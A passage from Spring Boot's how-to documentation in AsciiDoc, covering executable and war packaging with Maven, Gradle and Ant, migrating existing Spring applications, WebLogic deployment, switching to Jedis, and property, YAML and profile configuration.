Maven\nPlugin, you would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a Non-executable JAR with Exclusions\nOften, if you have an executable and a non-executable jar as two separate build products,\nthe executable version has additional configuration files that are not needed in a library\njar. 
For example, the `application.yml` configuration file might be excluded from the
non-executable JAR.

In Maven, the executable jar must be the main artifact and you can add a classified jar
for the library, as follows:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
			<plugin>
				<artifactId>maven-jar-plugin</artifactId>
				<executions>
					<execution>
						<id>lib</id>
						<phase>package</phase>
						<goals>
							<goal>jar</goal>
						</goals>
						<configuration>
							<classifier>lib</classifier>
							<excludes>
								<exclude>application.yml</exclude>
							</excludes>
						</configuration>
					</execution>
				</executions>
			</plugin>
		</plugins>
	</build>
----



[[howto-remote-debug-maven-run]]
=== Remote Debug a Spring Boot Application Started with Maven
To attach a remote debugger to a Spring Boot application that was started with Maven, you
can use the `jvmArguments` property of the {spring-boot-maven-plugin-site}[maven plugin].

See {spring-boot-maven-plugin-site}/examples/run-debug.html[this example] for more
details.



[[howto-build-an-executable-archive-with-ant]]
=== Build an Executable Archive from Ant without Using `spring-boot-antlib`
To build with Ant, you need to grab dependencies, compile, and then create a jar or war
archive. To make it executable, you can either use the `spring-boot-antlib`
module or you can follow these instructions:

. If you are building a jar, package the application's classes and resources in a nested
`BOOT-INF/classes` directory. If you are building a war, package the application's
classes in a nested `WEB-INF/classes` directory as usual.
. Add the runtime dependencies in a nested `BOOT-INF/lib` directory for a jar or
`WEB-INF/lib` for a war. Remember *not* to compress the entries in the archive.
. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF/lib`
directory for a jar or `WEB-INF/lib-provided` for a war. Remember *not* to compress the
entries in the archive.
. Add the `spring-boot-loader` classes at the root of the archive (so that the `Main-Class`
is available).
. Use the appropriate launcher (such as `JarLauncher` for a jar file) as a `Main-Class`
attribute in the manifest and specify the other properties it needs as manifest entries,
principally by setting a `Start-Class` property.

The following example shows how to build an executable archive with Ant:

[source,xml,indent=0]
----
	<target name="build" depends="compile">
		<jar destfile="target/${ant.project.name}-${spring-boot.version}.jar" compress="false">
			<mappedresources>
				<fileset dir="target/classes" />
				<globmapper from="*" to="BOOT-INF/classes/*"/>
			</mappedresources>
			<mappedresources>
				<fileset dir="src/main/resources" erroronmissingdir="false"/>
				<globmapper from="*" to="BOOT-INF/classes/*"/>
			</mappedresources>
			<mappedresources>
				<fileset dir="${lib.dir}/runtime" />
				<globmapper from="*" to="BOOT-INF/lib/*"/>
			</mappedresources>
			<zipfileset src="${lib.dir}/loader/spring-boot-loader-jar-${spring-boot.version}.jar" />
			<manifest>
				<attribute name="Main-Class" value="org.springframework.boot.loader.JarLauncher" />
				<attribute name="Start-Class" value="${start-class}" />
			</manifest>
		</jar>
	</target>
----

The {github-code}/spring-boot-samples/spring-boot-sample-ant[Ant Sample] has a
`build.xml` file with a `manual` task that should work if you run it with the following
command:

[indent=0,subs="verbatim,quotes,attributes"]
----
	$ ant -lib <folder containing ivy-2.2.jar> clean manual
----

Then you can run the application with the following command:

[indent=0,subs="verbatim,quotes,attributes"]
----
	$ java -jar target/*.jar
----



[[howto-traditional-deployment]]
== Traditional Deployment

Spring Boot supports traditional deployment as well as more modern forms of deployment.
This section answers common questions about traditional deployment.



[[howto-create-a-deployable-war-file]]
=== Create a Deployable War File

WARNING: Because Spring WebFlux does not strictly depend on the Servlet API and
applications are deployed by default on an embedded Reactor Netty server,
war deployment is not supported for WebFlux applications.

The first step in producing a deployable war file is to provide a
`SpringBootServletInitializer` subclass and override its `configure` method. Doing so
makes use of Spring Framework's Servlet 3.0 support and lets you configure your
application when it is launched by the servlet container. Typically, you should update
your application's main class to extend `SpringBootServletInitializer`, as shown in the
following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@SpringBootApplication
	public class Application extends SpringBootServletInitializer {

		@Override
		protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
			return application.sources(Application.class);
		}

		public static void main(String[] args) {
			SpringApplication.run(Application.class, args);
		}

	}
----

The next step is to update your build configuration such that your project produces a war
file rather than a jar file.
If you use Maven and `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you), all you need to do is to modify `pom.xml` to\nchange the packaging to war, as follows:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you use Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject, as follows:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container does not\ninterfere with the servlet container to which the war file is deployed. To do so, you\nneed to mark the embedded servlet container dependency as being provided.\n\nIf you use Maven, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nIf you use Gradle, the following example marks the servlet container (Tomcat, in this\ncase) as being provided:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nTIP: `providedRuntime` is preferred to Gradle's `compileOnly` configuration. Among other\nlimitations, `compileOnly` dependencies are not on the test classpath, so any web-based\nintegration tests fail.\n\nIf you use the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided produces an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication by using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based\nexample] of the previously described configuration.\n\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an Existing Application to Spring Boot\nFor a non-web application, it should be easy to convert an existing Spring application to\na Spring Boot application. To do so, throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`. Spring MVC web applications are generally amenable to first\ncreating a deployable war application and then migrating it later to an executable war\nor jar. 
See the https://spring.io/guides/gs/convert-jar-to-war/[Getting
Started Guide on Converting a jar to a war].

To create a deployable war by extending `SpringBootServletInitializer` (for example, in a
class called `Application`) and adding the Spring Boot `@SpringBootApplication`
annotation, use code similar to that shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@SpringBootApplication
	public class Application extends SpringBootServletInitializer {

		@Override
		protected SpringApplicationBuilder configure(SpringApplicationBuilder application) {
			// Customize the application or call application.sources(...) to add sources
			// Since our example is itself a @Configuration class (via @SpringBootApplication)
			// we actually don't need to override this method.
			return application;
		}

	}
----

Remember that whatever you put in the `sources` is merely a Spring `ApplicationContext`.
Normally, anything that already works should work here. There might be some beans you can
remove later and let Spring Boot provide its own defaults for them, but it should be
possible to get something working before you need to do that.

Static resources can be moved to `/public` (or `/static` or `/resources` or
`/META-INF/resources`) in the classpath root. The same applies to `messages.properties`
(which Spring Boot automatically detects in the root of the classpath).

Vanilla usage of Spring `DispatcherServlet` and Spring Security should require no further
changes. If you have other features in your application (for instance, using other
servlets or filters), you may need to add some configuration to your `Application`
context to replace those elements from the `web.xml`, as follows:

* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the
container as if it were a `<servlet/>` and `<servlet-mapping/>` in `web.xml` (see the
sketch after this list).
* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (as a
`<filter/>` and `<filter-mapping/>`).
* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in
your `Application`. Alternatively, simple cases where annotation configuration is
heavily used already can be recreated in a few lines as `@Bean` definitions.
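As a rough illustration of the first bullet, the following sketch registers a hypothetical
`MyServlet` under `/my/*` (the servlet class and mapping are illustrative):

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@Bean
	public ServletRegistrationBean<MyServlet> myServlet() {
		// Equivalent to a <servlet/> plus <servlet-mapping/> entry in web.xml
		return new ServletRegistrationBean<>(new MyServlet(), "/my/*");
	}
----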
Once the war file is working, you can make it executable by adding a `main` method to
your `Application`, as shown in the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	public static void main(String[] args) {
		SpringApplication.run(Application.class, args);
	}
----

[NOTE]
====
If you intend to start your application as a war or as an executable application, you
need to share the customizations of the builder in a method that is available both to the
`SpringBootServletInitializer` callback and to the `main` method in a class similar to the
following:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	@SpringBootApplication
	public class Application extends SpringBootServletInitializer {

		@Override
		protected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {
			return configureApplication(builder);
		}

		public static void main(String[] args) {
			configureApplication(new SpringApplicationBuilder()).run(args);
		}

		private static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {
			return builder.sources(Application.class).bannerMode(Banner.Mode.OFF);
		}

	}
----
====

Applications can fall into more than one category:

* Servlet 3.0+ applications with no `web.xml`.
* Applications with a `web.xml`.
* Applications with a context hierarchy.
* Applications without a context hierarchy.

All of these should be amenable to translation, but each might require slightly different
techniques.

Servlet 3.0+ applications might translate pretty easily if they already use the Spring
Servlet 3.0+ initializer support classes. Normally, all the code from an existing
`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your
existing application has more than one `ApplicationContext` (for example, if it uses
`AbstractDispatcherServletInitializer`) then you might be able to combine all your context
sources into a single `SpringApplication`. The main complication you might encounter is if
combining does not work and you need to maintain the context hierarchy. See the
<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for
examples. An existing parent context that contains web-specific features usually
needs to be broken up so that all the `ServletContextAware` components are in the child
context.

Applications that are not already Spring applications might be convertible to Spring
Boot applications, and the previously mentioned guidance may help. However, you may yet
encounter problems.
In that case, we suggest
https://stackoverflow.com/questions/tagged/spring-boot[asking questions on Stack Overflow
with a tag of `spring-boot`].



[[howto-weblogic]]
=== Deploying a WAR to WebLogic
To deploy a Spring Boot application to WebLogic, you must ensure that your servlet
initializer *directly* implements `WebApplicationInitializer` (even if you extend from a
base class that already implements it).

A typical initializer for WebLogic should resemble the following example:

[source,java,indent=0,subs="verbatim,quotes,attributes"]
----
	import org.springframework.boot.autoconfigure.SpringBootApplication;
	import org.springframework.boot.web.servlet.support.SpringBootServletInitializer;
	import org.springframework.web.WebApplicationInitializer;

	@SpringBootApplication
	public class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {

	}
----

If you use Logback, you also need to tell WebLogic to prefer the packaged version
rather than the version that was pre-installed with the server. You can do so by adding a
`WEB-INF/weblogic.xml` file with the following contents:

[source,xml,indent=0]
----
	<?xml version="1.0" encoding="UTF-8"?>
	<wls:weblogic-web-app
		xmlns:wls="http://xmlns.oracle.com/weblogic/weblogic-web-app"
		xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
		xsi:schemaLocation="http://java.sun.com/xml/ns/javaee
			http://java.sun.com/xml/ns/javaee/ejb-jar_3_0.xsd
			http://xmlns.oracle.com/weblogic/weblogic-web-app
			http://xmlns.oracle.com/weblogic/weblogic-web-app/1.4/weblogic-web-app.xsd">
		<wls:container-descriptor>
			<wls:prefer-application-packages>
				<wls:package-name>org.slf4j</wls:package-name>
			</wls:prefer-application-packages>
		</wls:container-descriptor>
	</wls:weblogic-web-app>
----



[[howto-use-jedis-instead-of-lettuce]]
=== Use Jedis Instead of Lettuce
By default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses
https://github.com/lettuce-io/lettuce-core/[Lettuce]. You need to exclude that
dependency and include the https://github.com/xetorthio/jedis/[Jedis] one instead. Spring
Boot manages these dependencies to help make this process as easy as possible.

The following example shows how to do so in Maven:

[source,xml,indent=0,subs="verbatim,quotes,attributes"]
----
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-data-redis</artifactId>
		<exclusions>
			<exclusion>
				<groupId>io.lettuce</groupId>
				<artifactId>lettuce-core</artifactId>
			</exclusion>
		</exclusions>
	</dependency>
	<dependency>
		<groupId>redis.clients</groupId>
		<artifactId>jedis</artifactId>
	</dependency>
----

The following example shows how to do so in Gradle:

[source,groovy,indent=0,subs="verbatim,quotes,attributes"]
----
	configurations {
		compile.exclude module: "lettuce"
	}

	dependencies {
		compile("redis.clients:jedis")
		// ...
	}
----



[[howto]]
= '`How-to`' guides

[partintro]
--
This section provides answers to some common '`how do I do that...`' questions
that often arise when using Spring Boot.
Its coverage is not exhaustive, but it
does cover quite a lot.

If you have a specific problem that we do not cover here, you might want to check out
https://stackoverflow.com/tags/spring-boot[stackoverflow.com] to see if someone has
already provided an answer. This is also a great place to ask new questions (please use
the `spring-boot` tag).

We are also more than happy to extend this section. If you want to add a '`how-to`',
send us a {github-code}[pull request].
--



[[howto-spring-boot-application]]
== Spring Boot Application

This section includes topics relating directly to Spring Boot applications.



[[howto-failure-analyzer]]
=== Create Your Own FailureAnalyzer
{dc-spring-boot}/diagnostics/FailureAnalyzer.{dc-ext}[`FailureAnalyzer`] is a great way
to intercept an exception on startup and turn it into a human-readable message, wrapped
in a {dc-spring-boot}/diagnostics/FailureAnalysis.{dc-ext}[`FailureAnalysis`]. Spring
Boot provides such an analyzer for application-context-related exceptions, JSR-303
validations, and more. You can also create your own.

`AbstractFailureAnalyzer` is a convenient extension of `FailureAnalyzer` that checks for
the presence of a specified exception type in the exception to handle. You can extend it
so that your implementation gets a chance to handle the exception only when it is
actually present. If, for whatever reason, you cannot handle the exception, return `null`
to give another implementation a chance to handle the exception.

`FailureAnalyzer` implementations must be registered in `META-INF/spring.factories`.
The following example registers `ProjectConstraintViolationFailureAnalyzer`:

[source,properties,indent=0]
----
	org.springframework.boot.diagnostics.FailureAnalyzer=\
	com.example.ProjectConstraintViolationFailureAnalyzer
----

NOTE: If you need access to the `BeanFactory` or the `Environment`, your `FailureAnalyzer`
can simply implement `BeanFactoryAware` or `EnvironmentAware`, respectively.
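For illustration, a rough sketch of the analyzer registered above (the exception type and
messages are illustrative):

[source,java,indent=0]
----
	import javax.validation.ConstraintViolationException;

	import org.springframework.boot.diagnostics.AbstractFailureAnalyzer;
	import org.springframework.boot.diagnostics.FailureAnalysis;

	public class ProjectConstraintViolationFailureAnalyzer
			extends AbstractFailureAnalyzer<ConstraintViolationException> {

		@Override
		protected FailureAnalysis analyze(Throwable rootFailure, ConstraintViolationException cause) {
			// The description explains what went wrong; the action suggests a fix
			return new FailureAnalysis("Validation failed: " + cause.getMessage(),
					"Review the reported constraint violations and correct the offending values.",
					cause);
		}

	}
----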
[[howto-troubleshoot-auto-configuration]]
=== Troubleshoot Auto-configuration
The Spring Boot auto-configuration tries its best to "`do the right thing`", but
sometimes things fail, and it can be hard to tell why.

There is a really useful `ConditionEvaluationReport` available in any Spring Boot
`ApplicationContext`. You can see it if you enable `DEBUG` logging output. If you use
the `spring-boot-actuator` (see <<production-ready-features.adoc,the Actuator chapter>>),
there is also a `conditions` endpoint that renders the report in JSON. Use that endpoint
to debug the application and see what features have been added (and which have not been
added) by Spring Boot at runtime.

Many more questions can be answered by looking at the source code and the Javadoc. When
reading the code, remember the following rules of thumb:

* Look for classes called `+*AutoConfiguration+` and read their sources. Pay special
attention to the `+@Conditional*+` annotations to find out what features they enable and
when. Add `--debug` to the command line or a System property `-Ddebug` to get a log on the
console of all the auto-configuration decisions that were made in your app. In a running
Actuator app, look at the `conditions` endpoint (`/actuator/conditions` or the JMX
equivalent) for the same information.
* Look for classes that are `@ConfigurationProperties` (such as
{sc-spring-boot-autoconfigure}/web/ServerProperties.{sc-ext}[`ServerProperties`])
and read from there the available external configuration options. The
`@ConfigurationProperties` annotation has a `name` attribute that acts as a prefix to
external properties. Thus, `ServerProperties` has `prefix="server"` and its configuration
properties are `server.port`, `server.address`, and others. In a running Actuator app,
look at the `configprops` endpoint.
* Look for uses of the `bind` method on the `Binder` to pull configuration values
explicitly out of the `Environment` in a relaxed manner. It is often used with a prefix.
* Look for `@Value` annotations that bind directly to the `Environment`.
* Look for `@ConditionalOnExpression` annotations that switch features on and off in
response to SpEL expressions, normally evaluated with placeholders resolved from the
`Environment`.



[[howto-customize-the-environment-or-application-context]]
=== Customize the Environment or ApplicationContext Before It Starts
A `SpringApplication` has `ApplicationListeners` and `ApplicationContextInitializers` that
are used to apply customizations to the context or environment. Spring Boot loads a number
of such customizations for use internally from `META-INF/spring.factories`. There is more
than one way to register additional customizations:

* Programmatically, per application, by calling the `addListeners` and `addInitializers`
methods on `SpringApplication` before you run it.
* Declaratively, per application, by setting the `context.initializer.classes` or
`context.listener.classes` properties.
* Declaratively, for all applications, by adding a `META-INF/spring.factories` and packaging
a jar file that the applications all use as a library.

The `SpringApplication` sends some special `ApplicationEvents` to the listeners (some
even before the context is created) and then registers the listeners for events published
by the `ApplicationContext` as well. See
"`<<spring-boot-features.adoc#boot-features-application-events-and-listeners>>`" in the
'`Spring Boot features`' section for a complete list.

It is also possible to customize the `Environment` before the application context is
refreshed by using `EnvironmentPostProcessor`. Each implementation should be registered in
`META-INF/spring.factories`, as shown in the following example:

[source,properties,indent=0]
----
	org.springframework.boot.env.EnvironmentPostProcessor=com.example.YourEnvironmentPostProcessor
----

The implementation can load arbitrary files and add them to the `Environment`. For
instance, the following example loads a YAML configuration file from the classpath:

[source,java,indent=0]
----
include::{code-examples}/context/EnvironmentPostProcessorExample.java[tag=example]
----

TIP: The `Environment` has already been prepared with all the usual property sources
that Spring Boot loads by default. It is therefore possible to get the location of the
file from the environment. The preceding example adds the `custom-resource` property
source at the end of the list so that a key defined in any of the usual other locations
takes precedence.
A custom implementation may define another order.

CAUTION: While using `@PropertySource` on your `@SpringBootApplication` may seem to be a
convenient and easy way to load a custom resource in the `Environment`, we do not
recommend it, because Spring Boot prepares the `Environment` before the
`ApplicationContext` is refreshed. Any key defined with `@PropertySource` is loaded too
late to have any effect on auto-configuration.



[[howto-build-an-application-context-hierarchy]]
=== Build an ApplicationContext Hierarchy (Adding a Parent or Root Context)
You can use the `SpringApplicationBuilder` class to create parent/child `ApplicationContext`
hierarchies. See "`<<spring-boot-features.adoc#boot-features-fluent-builder-api>>`"
in the '`Spring Boot features`' section for more information.



[[howto-create-a-non-web-application]]
=== Create a Non-web Application
Not all Spring applications have to be web applications (or web services). If you want to
execute some code in a `main` method but also bootstrap a Spring application to set up
the infrastructure to use, you can use the `SpringApplication` features of Spring
Boot. A `SpringApplication` changes its `ApplicationContext` class, depending on whether
it thinks it needs a web application or not. The first thing you can do to help it is to
leave server-related dependencies (e.g. servlet API) off the classpath. If you cannot do
that (for example, you run two applications from the same code base) then you can
explicitly call `setWebApplicationType(WebApplicationType.NONE)` on your
`SpringApplication` instance or set the `applicationContextClass` property (through the
Java API or with external properties). Application code that you want to run as your
business logic can be implemented as a `CommandLineRunner` and dropped into the context as
a `@Bean` definition.



[[howto-properties-and-configuration]]
== Properties and Configuration

This section includes topics about setting and reading properties and configuration
settings and their interaction with Spring Boot applications.

[[howto-automatic-expansion]]
=== Automatically Expand Properties at Build Time
Rather than hardcoding some properties that are also specified in your project's build
configuration, you can automatically expand them by using the existing build
configuration instead. This is possible in both Maven and Gradle.



[[howto-automatic-expansion-maven]]
==== Automatic Property Expansion Using Maven
You can automatically expand properties from the Maven project by using resource
filtering. If you use the `spring-boot-starter-parent`, you can then refer to your
Maven '`project properties`' with `@..@` placeholders, as shown in the following example:

[source,properties,indent=0]
----
	app.encoding=@project.build.sourceEncoding@
	app.java.version=@java.version@
----

NOTE: Only production configuration is filtered that way (in other words, no filtering is
applied on `src/test/resources`).

TIP: If you enable the `addResources` flag, the `spring-boot:run` goal can add
`src/main/resources` directly to the classpath (for hot reloading purposes). Doing so
circumvents the resource filtering and this feature. Instead, you can use the `exec:java`
goal or customize the plugin's configuration.
See the\n{spring-boot-maven-plugin-site}\/usage.html[plugin usage page] for more details.\n\nIf you do not use the starter parent, you need to include the following element inside\nthe `<build\/>` element of your `pom.xml`:\n\n[source,xml,indent=0]\n----\n\t<resources>\n\t\t<resource>\n\t\t\t<directory>src\/main\/resources<\/directory>\n\t\t\t<filtering>true<\/filtering>\n\t\t<\/resource>\n\t<\/resources>\n----\n\nYou also need to include the following element inside `<plugins\/>`:\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.apache.maven.plugins<\/groupId>\n\t\t<artifactId>maven-resources-plugin<\/artifactId>\n\t\t<version>2.7<\/version>\n\t\t<configuration>\n\t\t\t<delimiters>\n\t\t\t\t<delimiter>@<\/delimiter>\n\t\t\t<\/delimiters>\n\t\t\t<useDefaultDelimiters>false<\/useDefaultDelimiters>\n\t\t<\/configuration>\n\t<\/plugin>\n----\n\nNOTE: The `useDefaultDelimiters` property is important if you use standard Spring\nplaceholders (such as `${placeholder}`) in your configuration. If that property is not\nset to `false`, these may be expanded by the build.\n\n\n\n[[howto-automatic-expansion-gradle]]\n==== Automatic Property Expansion Using Gradle\nYou can automatically expand properties from the Gradle project by configuring the\nJava plugin's `processResources` task to do so, as shown in the following example:\n\n[source,groovy,indent=0]\n----\n\tprocessResources {\n\t\texpand(project.properties)\n\t}\n----\n\nYou can then refer to your Gradle project's properties by using placeholders, as shown in the\nfollowing example:\n\n[source,properties,indent=0]\n----\n\tapp.name=${name}\n\tapp.description=${description}\n----\n\nNOTE: Gradle's `expand` method uses Groovy's `SimpleTemplateEngine`, which transforms\n`${..}` tokens. The `${..}` style conflicts with Spring's own property placeholder\nmechanism. To use Spring property placeholders together with automatic expansion, escape\nthe Spring property placeholders as follows: `\\${..}`.\n\n\n\n\n[[howto-externalize-configuration]]\n=== Externalize the Configuration of `SpringApplication`\nA `SpringApplication` has bean properties (mainly setters), so you can use its Java API as\nyou create the application to modify its behavior. Alternatively, you can externalize the\nconfiguration by setting properties in `+spring.main.*+`. 
For example, in
`application.properties`, you might have the following settings:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.main.web-application-type=none
	spring.main.banner-mode=off
----

Then the Spring Boot banner is not printed on startup, and the application does not start
an embedded web server.

Properties defined in external configuration override the values specified with the Java
API, with the notable exception of the sources used to create the `ApplicationContext`.
Consider the following application:

[source,java,indent=0]
----
	new SpringApplicationBuilder()
		.bannerMode(Banner.Mode.OFF)
		.sources(demo.MyApp.class)
		.run(args);
----

Now consider the following configuration:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.main.sources=com.acme.Config,com.acme.ExtraConfig
	spring.main.banner-mode=console
----

The actual application _now_ shows the banner (as overridden by configuration) and uses
three sources for the `ApplicationContext` (in the following order): `demo.MyApp`,
`com.acme.Config`, and `com.acme.ExtraConfig`.



[[howto-change-the-location-of-external-properties]]
=== Change the Location of External Properties of an Application
By default, properties from different sources are added to the Spring `Environment` in a
defined order (see "`<<spring-boot-features.adoc#boot-features-external-config>>`" in
the '`Spring Boot features`' section for the exact order).

A nice way to augment and modify this ordering is to add `@PropertySource` annotations to your
application sources. Classes passed to the `SpringApplication` static convenience
methods and those added using `setSources()` are inspected to see if they have
`@PropertySources`. If they do, those properties are added to the `Environment` early
enough to be used in all phases of the `ApplicationContext` lifecycle. Properties added
in this way have lower priority than any added by using the default locations (such as
`application.properties`), system properties, environment variables, or the command line.

You can also provide the following System properties (or environment variables) to change
the behavior:

* `spring.config.name` (`SPRING_CONFIG_NAME`): Defaults to `application` as the root of
the file name.
* `spring.config.location` (`SPRING_CONFIG_LOCATION`): The file to load (such as a
classpath resource or a URL). A separate `Environment` property source is set up for this
document, and it can be overridden by system properties, environment variables, or the
command line.

No matter what you set in the environment, Spring Boot always loads
`application.properties` as described above. By default, if YAML is used, then files with
the '`.yml`' extension are also added to the list.

Spring Boot logs the configuration files that are loaded at the `DEBUG` level and the
candidates it has not found at the `TRACE` level.

See {sc-spring-boot}/context/config/ConfigFileApplicationListener.{sc-ext}[`ConfigFileApplicationListener`]
for more detail.



[[howto-use-short-command-line-arguments]]
=== Use '`Short`' Command Line Arguments
Some people like to use (for example) `--port=9000` instead of `--server.port=9000` to
set configuration properties on the command line.
You can enable this behavior by using
placeholders in `application.properties`, as shown in the following example:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	server.port=${port:8080}
----

TIP: If you inherit from the `spring-boot-starter-parent` POM, the default filter
token of the `maven-resources-plugin` has been changed from `+${*}+` to `@` (that is,
`@maven.token@` instead of `${maven.token}`) to prevent conflicts with Spring-style
placeholders. If you have enabled Maven filtering for the `application.properties`
directly, you may want to also change the default filter token to use
https://maven.apache.org/plugins/maven-resources-plugin/resources-mojo.html#delimiters[other
delimiters].

NOTE: In this specific case, the port binding works in a PaaS environment such as Heroku
or Cloud Foundry. On those two platforms, the `PORT` environment variable is set
automatically, and Spring can bind to capitalized synonyms for `Environment` properties.



[[howto-use-yaml-for-external-properties]]
=== Use YAML for External Properties
YAML is a superset of JSON and, as such, is a convenient syntax for storing external
properties in a hierarchical format, as shown in the following example:

[source,yaml,indent=0,subs="verbatim,quotes,attributes"]
----
	spring:
		application:
			name: cruncher
		datasource:
			driverClassName: com.mysql.jdbc.Driver
			url: jdbc:mysql://localhost/test
	server:
		port: 9000
----

Create a file called `application.yml` and put it in the root of your classpath.
Then add `snakeyaml` to your dependencies (Maven coordinates `org.yaml:snakeyaml`, already
included if you use the `spring-boot-starter`). A YAML file is parsed to a Java
`Map<String,Object>` (like a JSON object), and Spring Boot flattens the map so that it
is one level deep and has period-separated keys, as many people are used to with
`Properties` files in Java.

The preceding example YAML corresponds to the following `application.properties` file:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.application.name=cruncher
	spring.datasource.driverClassName=com.mysql.jdbc.Driver
	spring.datasource.url=jdbc:mysql://localhost/test
	server.port=9000
----

See "`<<spring-boot-features.adoc#boot-features-external-config-yaml>>`" in
the '`Spring Boot features`' section for more information
about YAML.

[[howto-set-active-spring-profiles]]
=== Set the Active Spring Profiles
The Spring `Environment` has an API for this, but you would normally set a System property
(`spring.profiles.active`) or an OS environment variable (`SPRING_PROFILES_ACTIVE`).
Also, you can launch your application with a `-D` argument (remember to put it before the
main class or jar archive), as follows:

[indent=0,subs="verbatim,quotes,attributes"]
----
	$ java -jar -Dspring.profiles.active=production demo-0.0.1-SNAPSHOT.jar
----

In Spring Boot, you can also set the active profile in `application.properties`, as shown
in the following example:

[source,properties,indent=0,subs="verbatim,quotes,attributes"]
----
	spring.profiles.active=production
----

A value set this way is replaced by the System property or environment variable setting
but not by the `SpringApplicationBuilder.profiles()` method.
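For example, a minimal sketch (the `MyApp` class name is illustrative) that activates an
additional profile programmatically:

[source,java,indent=0]
----
	new SpringApplicationBuilder(MyApp.class)
		.profiles("extra") // activated in addition to profiles from the environment
		.run(args);
----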
Thus, the latter Java API can\nbe used to augment the profiles without changing the defaults.\n\nSee \"`<<spring-boot-features.adoc#boot-features-profiles>>`\" in\nthe \"`Spring Boot features`\" section for more information.\n\n\n\n[[howto-change-configuration-depending-on-the-environment]]\n=== Change Configuration Depending on the Environment\nA YAML file is actually a sequence of documents separated by `---` lines, and each\ndocument is parsed separately to a flattened map.\n\nIf a YAML document contains a `spring.profiles` key, then the profiles value\n(a comma-separated list of profiles) is fed into the Spring\n`Environment.acceptsProfiles()` method. If any of those profiles is active, that document\nis included in the final merge (otherwise, it is not), as shown in the following example:\n\n[source,yaml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tserver:\n\t\tport: 9000\n\t---\n\n\tspring:\n\t\tprofiles: development\n\tserver:\n\t\tport: 9001\n\n\t---\n\n\tspring:\n\t\tprofiles: production\n\tserver:\n\t\tport: 0\n----\n\nIn the preceding example, the default port is 9000. However, if the Spring profile called\n'`development`' is active, then the port is 9001. If '`production`' is active, then the\nport is 0.\n\nNOTE: The YAML documents are merged in the order in which they are encountered. Later\nvalues override earlier values.\n\nTo do the same thing with properties files, you can use\n`application-${profile}.properties` to specify profile-specific values.\n\n\n\n[[howto-discover-build-in-options-for-external-properties]]\n=== Discover Built-in Options for External Properties\nSpring Boot binds external properties from `application.properties` (or `.yml` files and\nother places) into an application at runtime. There is not (and technically cannot be) an\nexhaustive list of all supported properties in a single location, because contributions\ncan come from additional jar files on your classpath.\n\nA running application with the Actuator features has a `configprops` endpoint that shows\nall the bound and bindable properties available through `@ConfigurationProperties`.\n\nThe appendix includes an <<appendix-application-properties#common-application-properties,\n`application.properties`>> example with a list of the most common properties supported by\nSpring Boot. The definitive list comes from searching the source code for\n`@ConfigurationProperties` and 